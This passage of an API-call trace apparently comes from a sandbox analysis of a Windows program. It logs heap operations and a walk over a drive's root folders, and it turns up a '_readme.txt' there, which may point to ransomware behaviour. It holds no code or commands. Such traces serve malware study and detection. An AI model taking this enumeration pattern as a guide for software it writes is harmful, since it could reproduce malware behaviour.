ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0173.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c18 [0173.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59970 [0173.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x3530cb8 [0173.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a590d8 [0173.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59ec0 [0173.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e0c0 [0173.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534c68 | out: hHeap=0x2c0000) returned 1 [0173.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a58a20 | out: hHeap=0x2c0000) returned 1 [0173.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x353fef8 | out: hHeap=0x2c0000) returned 1 [0173.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59970 | out: hHeap=0x2c0000) returned 1 [0173.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c18 | out: hHeap=0x2c0000) returned 1 [0173.568] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xaece4da0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0173.568] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0173.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c18 [0173.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59970 [0173.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a58a20 [0173.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59970 | out: hHeap=0x2c0000) returned 1 [0173.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c18 | out: hHeap=0x2c0000) returned 1 [0173.568] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe99ea380, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe99ea380, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0173.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534c68 [0173.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc) returned 0x3a5a700 [0173.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534cd8 [0173.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c18 [0173.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59970 [0173.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a078 [0173.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a590d8 | out: hHeap=0x2c0000) returned 1 [0173.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59ec0 | out: hHeap=0x2c0000) returned 1 [0173.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e0c0 | out: hHeap=0x2c0000) returned 1 [0173.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a58a20 | out: hHeap=0x2c0000) returned 1 [0173.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3530cb8 | out: hHeap=0x2c0000) returned 1 [0173.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534c68 | out: hHeap=0x2c0000) returned 1 [0173.569] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x10f11a30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x10f11a30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0173.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534c68 [0173.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3237b8 [0173.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534c68 | out: hHeap=0x2c0000) returned 1 [0173.569] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0173.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a58a20 [0173.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59ec0 [0173.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a58a20 | out: hHeap=0x2c0000) returned 1 [0173.569] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0173.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a58a20 [0173.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16c) returned 0x3ac8068 [0173.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534c68 [0173.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a590d8 [0173.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59da8 [0173.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e0c0 [0173.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59e20 [0173.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59b28 [0173.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59fb0 [0173.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534cd8 | out: hHeap=0x2c0000) returned 1 [0173.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c18 | out: hHeap=0x2c0000) returned 1 [0173.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59970 | out: hHeap=0x2c0000) returned 1 [0173.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a078 | out: hHeap=0x2c0000) returned 1 [0173.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534d48 | out: hHeap=0x2c0000) returned 1 [0173.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3237b8 | out: hHeap=0x2c0000) returned 1 [0173.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59ec0 | out: hHeap=0x2c0000) returned 1 [0173.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a700 | out: hHeap=0x2c0000) returned 1 [0173.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59ec0 [0173.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a58a20 | out: hHeap=0x2c0000) returned 1 [0173.570] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0173.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e108 [0173.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9dcd0 [0173.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e108 | out: hHeap=0x2c0000) returned 1 [0173.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e078 | out: hHeap=0x2c0000) returned 1 [0173.571] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17a076c0, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x17a076c0, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x17a076c0, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0173.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a58a20 [0173.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a078 [0173.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a58a20 | out: hHeap=0x2c0000) returned 1 [0173.571] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0173.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a58a20 [0173.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a58a20 | out: hHeap=0x2c0000) returned 1 [0173.571] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0173.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a58a20 [0173.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c90 [0173.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x214) returned 0x32b598 [0173.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3237b8 [0173.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59970 [0173.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59c18 [0173.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e078 [0173.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a140 [0173.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59b50 [0173.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534d48 [0173.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534cd8 [0173.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59948 [0173.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e108 [0173.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534c68 | out: hHeap=0x2c0000) returned 1 [0173.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a590d8 | out: hHeap=0x2c0000) returned 1 [0173.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59da8 | out: hHeap=0x2c0000) returned 1 [0173.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9e0c0 | out: hHeap=0x2c0000) returned 1 [0173.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59e20 | out: hHeap=0x2c0000) returned 1 [0173.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59b28 | out: hHeap=0x2c0000) returned 1 [0173.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fda70 | out: hHeap=0x2c0000) returned 1 [0173.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59fb0 | out: hHeap=0x2c0000) returned 1 [0173.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59ec0 | out: hHeap=0x2c0000) returned 1 [0173.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a9dcd0 | out: hHeap=0x2c0000) returned 1 [0173.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a078 | out: hHeap=0x2c0000) returned 1 [0173.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ac8068 | out: hHeap=0x2c0000) returned 1 [0173.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59c90 | out: hHeap=0x2c0000) returned 1 [0173.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a58a20 | out: hHeap=0x2c0000) returned 1 [0173.572] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e3ce860, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e3ce860, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e3ce860, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.572] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e3ce860, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e3ce860, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e3ce860, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.572] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2fda70 [0173.573] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: hHeap=0x2c0000) returned 1 [0173.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x3534b88 [0173.574] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3534b88 | out: 